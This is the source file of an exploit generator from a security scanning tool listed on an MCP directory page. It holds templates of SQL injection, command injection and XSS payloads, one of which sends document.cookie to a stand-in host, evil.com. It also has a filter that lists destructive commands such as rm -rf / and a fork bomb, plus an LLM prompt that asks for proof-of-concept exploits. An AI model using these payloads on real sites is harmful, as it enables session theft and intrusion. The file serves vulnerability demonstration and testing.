Skip to main content
Glama

Adversary MCP Server

by brettbergin
exploit_generator.py17 kB
"""Exploit generator for creating proof-of-concept security exploits.""" import json import re from dataclasses import dataclass from typing import Any from jinja2 import Environment, Template from ..config import SecurityConfig from ..credentials import CredentialManager from .types import Category, ThreatMatch class ExploitGenerationError(Exception): """Exception raised when exploit generation fails.""" pass @dataclass class ExploitContext: """Context information for exploit generation.""" threat_match: ThreatMatch source_code: str additional_context: dict[str, Any] = None def __post_init__(self): if self.additional_context is None: self.additional_context = {} @dataclass class ExploitPrompt: """Represents a prompt for exploit generation.""" system_prompt: str user_prompt: str threat_match: ThreatMatch source_code: str def to_dict(self) -> dict[str, Any]: """Convert to dictionary for JSON serialization.""" return { "system_prompt": self.system_prompt, "user_prompt": self.user_prompt, "threat_type": self.threat_match.rule_name, "severity": self.threat_match.severity.value, "category": self.threat_match.category.value, "file_path": self.threat_match.file_path, "line_number": self.threat_match.line_number, } class SafetyFilter: """Filter to ensure exploits are safe for educational purposes.""" def __init__(self): self.dangerous_patterns = [ r"rm\s+-rf\s+/", r"format\s+c:", r"del\s+/s\s+/q", r":\(\)\{\s*:\s*\|\s*:\s*&\s*\}\s*;", # Fork bomb r"while\s*\(\s*1\s*\)", # Infinite loop r'exec\s*\(\s*["\']rm\s+-rf', r'subprocess\.call\s*\(\s*["\']rm\s+-rf', r'os\.system\s*\(\s*["\']rm\s+-rf', r'eval\s*\(\s*["\'].*rm\s+-rf', r'shell_exec\s*\(\s*["\']rm\s+-rf', r'system\s*\(\s*["\']rm\s+-rf', ] self.compiled_patterns = [ re.compile(pattern, re.IGNORECASE) for pattern in self.dangerous_patterns ] def is_safe(self, exploit: str) -> bool: """Check if an exploit is safe for educational purposes. Args: exploit: The exploit string to check Returns: True if the exploit is safe, False otherwise """ for pattern in self.compiled_patterns: if pattern.search(exploit): return False return True def sanitize_exploit(self, exploit: str) -> str: """Sanitize an exploit to make it safe for educational purposes. Args: exploit: The exploit string to sanitize Returns: Sanitized exploit string """ # Replace dangerous commands with safe alternatives safe_exploit = exploit # Replace destructive commands safe_exploit = re.sub( r"rm\s+-rf\s+/", 'echo "This would delete files"', safe_exploit ) safe_exploit = re.sub( r"format\s+c:", 'echo "This would format drive"', safe_exploit ) safe_exploit = re.sub( r"del\s+/s\s+/q", 'echo "This would delete files"', safe_exploit ) # Add safety warnings if not safe_exploit.startswith("# WARNING:"): safe_exploit = ( "# WARNING: This is for educational purposes only!\n" + safe_exploit ) return safe_exploit class TemplateEngine: """Engine for generating exploits from templates.""" def __init__(self): # This is intentional for educational exploit generation in a defensive security tool # deepcode ignore XSS: False positive - this is a defensive security tool that generates # educational exploits with proper safety warnings and context # nosemgrep: python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2 self.env = ( Environment() ) # nosec B701 - autoescape disabled intentionally for exploit generation self.templates = self._load_built_in_templates() def _load_built_in_templates(self) -> dict[str, Template]: """Load built-in exploit templates. Returns: Dictionary of template name to Template object """ templates = {} # SQL Injection template templates["sql_injection"] = self.env.from_string( """ # SQL Injection Exploit # Target: {{ threat.rule_name }} # Severity: {{ threat.severity.value }} # Basic SQL injection payload payload = "' OR '1'='1" # Union-based injection union_payload = "' UNION SELECT username, password FROM users--" # Time-based blind injection time_payload = "'; WAITFOR DELAY '00:00:05'--" # Boolean-based blind injection boolean_payload = "' AND (SELECT COUNT(*) FROM users) > 0--" # Example usage: # In the vulnerable code: {{ threat.code_snippet }} # Replace user input with: {{ payload }} """ ) # XSS template templates["xss"] = self.env.from_string( """ # Cross-Site Scripting (XSS) Exploit # Target: {{ threat.rule_name }} # Severity: {{ threat.severity.value }} # Basic XSS payload payload = "<script>alert('XSS')</script>" # Cookie stealing payload cookie_payload = "<script>document.location='http://evil.com/steal.php?cookie='+document.cookie</script>" # DOM manipulation payload dom_payload = "<img src='x' onerror='alert(document.domain)'>" # Example usage: # In the vulnerable code: {{ threat.code_snippet }} # Input: {{ payload }} """ ) # Command injection template templates["command_injection"] = self.env.from_string( """ # Command Injection Exploit # Target: {{ threat.rule_name }} # Severity: {{ threat.severity.value }} # Basic command injection payload = "; ls -la" # Command chaining chain_payload = " && whoami" # Safe demonstration payload safe_payload = "; echo 'Command injection successful'" # Example usage: # In the vulnerable code: {{ threat.code_snippet }} # Input: {{ payload }} """ ) return templates def generate_exploit( self, threat_match: ThreatMatch, source_code: str ) -> list[str]: """Generate exploit from template. Args: threat_match: The threat match to generate exploit for source_code: The vulnerable source code Returns: List of exploit strings """ exploits = [] # Try to find appropriate template template_name = self._get_template_name(threat_match.category) if template_name and template_name in self.templates: template = self.templates[template_name] exploit = template.render(threat=threat_match, source_code=source_code) exploits.append(exploit) return exploits def _get_template_name(self, category: Category) -> str | None: """Get template name for a threat category. Args: category: The threat category Returns: Template name or None if not found """ category_map = { Category.INJECTION: "sql_injection", Category.XSS: "xss", Category.RCE: "command_injection", } return category_map.get(category) def add_template(self, name: str, template_content: str) -> None: """Add a custom template. Args: name: Template name template_content: Template content """ self.templates[name] = self.env.from_string(template_content) class LLMExploitGenerator: """LLM-based exploit generator that creates prompts for client LLMs.""" def __init__(self, config: SecurityConfig): """Initialize the LLM exploit generator. Args: config: Security configuration """ self.config = config def create_exploit_prompt(self, context: ExploitContext) -> ExploitPrompt: """Create exploit generation prompt. Args: context: Context for exploit generation Returns: ExploitPrompt object """ system_prompt = self._create_system_prompt() user_prompt = self._create_user_prompt(context) return ExploitPrompt( system_prompt=system_prompt, user_prompt=user_prompt, threat_match=context.threat_match, source_code=context.source_code, ) def parse_exploit_response(self, response_text: str) -> list[str]: """Parse exploit response from LLM. Args: response_text: Raw response from LLM Returns: List of exploit strings """ # Parse multiple exploits if present exploits = self._parse_exploits(response_text) return exploits def _create_system_prompt(self) -> str: """Create system prompt for exploit generation. Returns: System prompt string """ return """You are a cybersecurity expert generating educational proof-of-concept exploits. Your task is to create safe, educational demonstrations of security vulnerabilities. Guidelines: 1. Always include warnings about responsible disclosure and legal use only 2. Make exploits safe for demonstration purposes (no actual harm) 3. Focus on educational value and understanding the vulnerability 4. Provide clear explanations of how the exploit works 5. Include remediation advice 6. Use placeholder/example data rather than real sensitive information 7. Avoid destructive commands or operations 8. Add appropriate safety warnings and disclaimers The exploits should be: - Safe for educational environments - Well-documented with comments - Focused on demonstrating the vulnerability concept - Include both the exploit and the fix/mitigation""" def _create_user_prompt(self, context: ExploitContext) -> str: """Create user prompt for exploit generation. Args: context: Exploit context Returns: Formatted prompt string """ threat = context.threat_match prompt = f""" Generate a proof-of-concept exploit for the following security vulnerability: **Vulnerability Details:** - Type: {threat.rule_name} - Description: {threat.description} - Category: {threat.category.value} - Severity: {threat.severity.value} - File: {threat.file_path} - Line: {threat.line_number} **Vulnerable Code:** ``` {context.source_code} ``` **Code Context:** {threat.code_snippet} **Requirements:** 1. Generate a safe, educational proof-of-concept exploit 2. Include clear explanations of how the exploit works 3. Provide remediation advice 4. Add appropriate warnings about responsible use 5. Make the exploit safe for demonstration (no actual harm) **Additional Context:** {json.dumps(context.additional_context, indent=2)} Please provide multiple exploit variations if applicable, clearly separated and labeled. """.strip() return prompt def _parse_exploits(self, text: str) -> list[str]: """Parse multiple exploits from LLM response. Args: text: LLM response text Returns: List of individual exploit strings """ # Simple parsing - split by code blocks or numbered sections exploits = [] # Split by code blocks code_blocks = re.findall(r"```[\s\S]*?```", text) if code_blocks: exploits.extend(code_blocks) # If no code blocks, use the entire text if not exploits: exploits = [text] return exploits class ExploitGenerator: """Main exploit generator combining templates and LLM generation.""" def __init__(self, credential_manager: CredentialManager): """Initialize the exploit generator. Args: credential_manager: Credential manager for configuration """ self.credential_manager = credential_manager self.config = credential_manager.load_config() self.template_engine = TemplateEngine() self.safety_filter = SafetyFilter() # Initialize LLM generator self.llm_generator = LLMExploitGenerator(self.config) def generate_exploits( self, threat_match: ThreatMatch, source_code: str = "", use_llm: bool = False ) -> list[str]: """Generate exploits for a threat match. Args: threat_match: The detected threat source_code: The vulnerable source code use_llm: Whether to use LLM for generation (now returns prompt instead) Returns: List of exploit strings """ exploits = [] # Generate from existing templates if available if threat_match.exploit_examples: exploits.extend(threat_match.exploit_examples) # Generate from templates template_exploits = self._generate_from_templates(threat_match, source_code) exploits.extend(template_exploits) # Note: LLM generation is now handled by the server via prompts # The client will call create_exploit_prompt() separately # Apply safety filter if enabled if self.config.exploit_safety_mode: exploits = [ self.safety_filter.sanitize_exploit(exploit) for exploit in exploits ] exploits = [ exploit for exploit in exploits if self.safety_filter.is_safe(exploit) ] return exploits def create_exploit_prompt( self, threat_match: ThreatMatch, source_code: str = "" ) -> ExploitPrompt: """Create exploit generation prompt for LLM. Args: threat_match: The detected threat source_code: The vulnerable source code Returns: ExploitPrompt object """ context = ExploitContext(threat_match, source_code) return self.llm_generator.create_exploit_prompt(context) def parse_exploit_response(self, response_text: str) -> list[str]: """Parse exploit response from LLM. Args: response_text: Raw response from LLM Returns: List of exploit strings """ exploits = self.llm_generator.parse_exploit_response(response_text) # Apply safety filter if enabled if self.config.exploit_safety_mode: exploits = [ self.safety_filter.sanitize_exploit(exploit) for exploit in exploits ] exploits = [ exploit for exploit in exploits if self.safety_filter.is_safe(exploit) ] return exploits def _generate_from_templates( self, threat_match: ThreatMatch, source_code: str ) -> list[str]: """Generate exploits from templates. Args: threat_match: The threat match source_code: The vulnerable source code Returns: List of exploit strings """ return self.template_engine.generate_exploit(threat_match, source_code) def add_custom_template(self, name: str, template_content: str) -> None: """Add a custom exploit template. Args: name: Template name template_content: Template content """ self.template_engine.add_template(name, template_content) def is_llm_available(self) -> bool: """Check if LLM generation is available. Returns: True if LLM is available (always true now since we use client LLM) """ return True def get_exploit_metadata(self, threat_match: ThreatMatch) -> dict[str, Any]: """Get metadata about possible exploits for a threat. Args: threat_match: The detected threat Returns: Dictionary with exploit metadata """ return { "category": threat_match.category.value, "severity": threat_match.severity.value, "cwe_id": threat_match.cwe_id, "owasp_category": threat_match.owasp_category, "available_templates": self._get_available_templates(threat_match.category), "llm_available": self.is_llm_available(), "safety_mode": self.config.exploit_safety_mode, } def _get_available_templates(self, category: Category) -> list[str]: """Get available templates for a category. Args: category: Threat category Returns: List of available template names """ category_templates = { Category.INJECTION: ["sql_injection", "command_injection"], Category.XSS: ["xss_dom"], Category.DESERIALIZATION: ["deserialization"], Category.LFI: ["path_traversal"], } return category_templates.get(category, [])

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/brettbergin/adversary-mcp-server'

If you have feedback or need assistance with the MCP directory API, please join our Discord server